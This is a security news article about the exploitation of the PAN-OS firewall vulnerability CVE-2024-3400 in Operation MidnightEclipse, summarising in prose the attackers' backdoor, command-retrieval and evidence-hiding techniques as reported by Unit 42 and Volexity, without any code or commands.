CVE-2024-3400 Vulnerability Hinges on Command Injection Flaw

Cyber attackers have been taking advantage of a recently revealed vulnerability in Palo Alto Networks PAN-OS software since March 26, 2024, almost three weeks before it was publicly disclosed. This activity, identified by Palo Alto Networks' Unit 42 division as Operation MidnightEclipse, is attributed to a single unidentified threat actor.

The security flaw, known as CVE-2024-3400 with a severity score of 10.0, allows unauthorized attackers to run arbitrary code with root privileges on affected firewalls. Notably, this vulnerability affects PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 configurations with GlobalProtect gateway and device telemetry enabled.

Operation MidnightEclipse involves exploiting this flaw to set up a recurring task that fetches commands from an external server and executes them using the bash shell. The attackers meticulously manage an access control list for the command-and-control server to restrict access only to the communicating device.

Python Backdoor Suspected as Part of Attack

Although the specific commands remain undisclosed, it is suspected that a Python-based backdoor, tracked as UPSTYLE by Volexity, is delivered via a URL hosted on a separate server. This backdoor, upon execution, writes and runs another Python script responsible for executing the attacker's commands, with results logged in legitimate firewall files.

A notable aspect of this attack is the use of authentic firewall files for command extraction and result writing. The commands are written to the firewall's error log through crafted network requests to a non-existent web page, triggering specific patterns that the backdoor then decodes and executes.

To conceal traces of command outputs, a function called "restore" is invoked to revert the bootstrap.min.css file to its original state after 15 seconds, erasing evidence of the commands. Volexity observed the threat actor exploiting the firewall to establish a reverse shell, download tools, penetrate internal networks, and exfiltrate data, though the extent of the campaign remains uncertain. The adversary is identified as UTA0218 by Volexity.

By Zaib
April 15, 2024
Computer Security
English
April 15, 2024
Computer Security

Popular Posts

As Fears of the Coronavirus Pandemic Spread, So Does...

4 years ago

Softcnapp Potentially Unwanted Application

2 months ago

Error: Ox800VDS Pop-up Scam

21 days ago

"Your iCloud is Being Hacked" and "Your iPhone has Been...

9 months ago

Alrucs Service Trojan

12 days ago

Remor.xyz Browser Hijacker

10 days ago

Related Posts

Computer Security

CVE-2024-23204 Apple's Shortcuts Vulnerability

Information has surfaced regarding a previously patched security vulnerability of high severity in Apple's Shortcuts app, which could enable a shortcut to access sensitive device data without user consent. The... Read more

February 29, 2024
Computer Security

CVE-2024-1071 WordPress Plugin Vulnerability

A significant security vulnerability has been revealed in Ultimate Member, a widely used WordPress plugin boasting over 200,000 active installations. Identified as CVE-2024-1071, this flaw has earned a high CVSS score... Read more

February 29, 2024
Computer Security

CVE-2023-52160 Wi-Fi Vulnerability

Researchers in cybersecurity have detected two authentication bypass vulnerabilities in open-source Wi-Fi software used in Android, Linux, and ChromeOS devices. These flaws could deceive users into connecting to a... Read more

March 1, 2024
English
Loading...

Cyclonis Backup Details & Terms

The Free Basic Cyclonis Backup plan gives you 2 GB of cloud storage space with full functionality! No credit card required. Need more storage space? Purchase a larger Cyclonis Backup plan today! To learn more about our policies and pricing, see Terms of Service, Privacy Policy, Discount Terms and Purchase Page. If you wish to uninstall the app, please visit the Uninstallation Instructions page.

Cyclonis Password Manager Details & Terms

FREE Trial: 30-Day One-Time Offer! No credit card required for Free Trial. Full functionality for the length of the Free Trial. (Full functionality after Free Trial requires subscription purchase.) To learn more about our policies and pricing, see EULA, Privacy Policy, Discount Terms and Purchase Page. If you wish to uninstall the app, please visit the Uninstallation Instructions page.

Home

Products

Cyclonis Backup Cyclonis Password Manager Cyclonis World Time

Support

Help Files FAQs Downloads Inquiries & Support

Company

About Us Contact Us Report Abuse

Legal (Post Merger)

EnigmaSoft Limited (fka Cyclonis Limited)

Cyclonis Backup's Terms of Service Cyclonis Password Manager's EULA Cyclonis World Time's Terms of Service Privacy Policy Cookie Policy Special Discount Offer Terms Additional Terms & Conditions SpyHunter EULA RegHunter EULA EnigmaSoft Privacy Policy & Cookie Policy ESG Privacy Policy & Cookie Policy EnigmaSoft Discount Offer Terms ESG Discount Offer Terms

© 2017-2024 Cyclonis Ltd. CYCLONIS is a trademark of EnigmaSoft Limited (Cyclonis was merged into EnigmaSoft Limited effective November 25, 2023.) All rights reserved.

Registered Office EnigmaSoft Limited: 1 Castle Street, 3rd Floor, Dublin 2 D02 XD82, Ireland.
EnigmaSoft Limited, Private Company Limited by shares, Company Registration Number 597114.

Windows is a trademark of Microsoft, registered in the U.S. and other countries.
Mac, iPhone, iPad and App Store are trademarks of Apple Inc., registered in the U.S. and other countries.
iOS is a registered trademark of Cisco Systems, Inc. and/or its affiliates in the United States and certain other countries.
Android and Google Play are trademarks of Google LLC.